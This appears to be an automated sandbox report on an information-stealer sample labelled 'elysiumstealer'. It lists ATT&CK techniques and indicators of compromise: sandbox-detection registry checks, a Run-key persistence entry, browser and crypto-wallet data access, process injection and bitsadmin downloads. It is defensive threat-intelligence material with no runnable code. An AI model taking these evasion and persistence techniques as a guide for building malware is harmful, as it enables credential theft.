elysiumstealer | b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fv6XVc_uoD3O9arHr5yy9k2k.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fv6XVc_uoD3O9arHr5yy9k2k.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	hKY8VniYB7kDoypSrH3gf9gF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	hKY8VniYB7kDoypSrH3gf9gF.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	EB7233922891E1DAD0434FBD52623647.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Installation.exe

Loads dropped DLL 3 IoCs

pid	Process
4492	rundll32.exe
2368	AcakfVHVK3ZpOKofv4SFb_LD.exe
2368	AcakfVHVK3ZpOKofv4SFb_LD.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral3/files/0x000100000001ac20-267.dat	themida
behavioral3/files/0x000100000001ac26-288.dat	themida
behavioral3/files/0x000100000001ac20-304.dat	themida
behavioral3/files/0x000100000001ac26-315.dat	themida
behavioral3/memory/5688-333-0x0000000001370000-0x0000000001371000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	2464796.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fv6XVc_uoD3O9arHr5yy9k2k.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	hKY8VniYB7kDoypSrH3gf9gF.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
157	ip-api.com
55	ipinfo.io
56	ipinfo.io

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5688	fv6XVc_uoD3O9arHr5yy9k2k.exe
6028	hKY8VniYB7kDoypSrH3gf9gF.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 1152 set thread context of 4660	1152	svchost.exe	96
PID 1152 set thread context of 5160	1152	svchost.exe	103
PID 5776 set thread context of 4504	5776	x2BFjy8SRtdIV0VKlMSL7WDQ.exe	127
PID 6020 set thread context of 5236	6020	dXBNAKqK98ZCDCS5MKKJLYPr.exe	126
PID 5612 set thread context of 3544	5612	oqNhLVxhlxKM6YjGsS_9x8pH.exe	128
PID 3584 set thread context of 5156	3584	QBwrEA4oHDK2kN65RvpTOsS5.exe	139
PID 5044 set thread context of 5332	5044	gGSI2_kSnGceMRNFFgKWX28N.exe	196

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	ObvJhkjc1_yeOR8FBjF3Ixme.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	ObvJhkjc1_yeOR8FBjF3Ixme.exe
File created	C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	AcakfVHVK3ZpOKofv4SFb_LD.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	AcakfVHVK3ZpOKofv4SFb_LD.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 27 IoCs

pid	pid_target	Process	procid_target
4672	5588	WerFault.exe	108
5224	5588	WerFault.exe	108
4700	5588	WerFault.exe	108
5252	5588	WerFault.exe	108
5796	5784	WerFault.exe	118
4784	5588	WerFault.exe	108
1680	5784	WerFault.exe	118
4320	5784	WerFault.exe	118
6036	5332	WerFault.exe	140
5128	5784	WerFault.exe	118
5208	5784	WerFault.exe	118
1060	5784	WerFault.exe	118
4712	5588	WerFault.exe	108
5228	5784	WerFault.exe	118
4620	5784	WerFault.exe	118
6052	5588	WerFault.exe	108
5844	5588	WerFault.exe	108
3788	5784	WerFault.exe	118
4708	5784	WerFault.exe	118
1564	5784	WerFault.exe	118
5444	5784	WerFault.exe	118
6532	5784	WerFault.exe	118
5356	5676	WerFault.exe	114
6196	3356	WerFault.exe	77
6748	1568	WerFault.exe	81
5244	6136	WerFault.exe	155
6440	5064	WerFault.exe	164

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	x2BFjy8SRtdIV0VKlMSL7WDQ.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	x2BFjy8SRtdIV0VKlMSL7WDQ.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	x2BFjy8SRtdIV0VKlMSL7WDQ.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6320	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
7040	timeout.exe
5744	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
6496	bitsadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6100	taskkill.exe
5856	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Info.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Info.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "5508"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
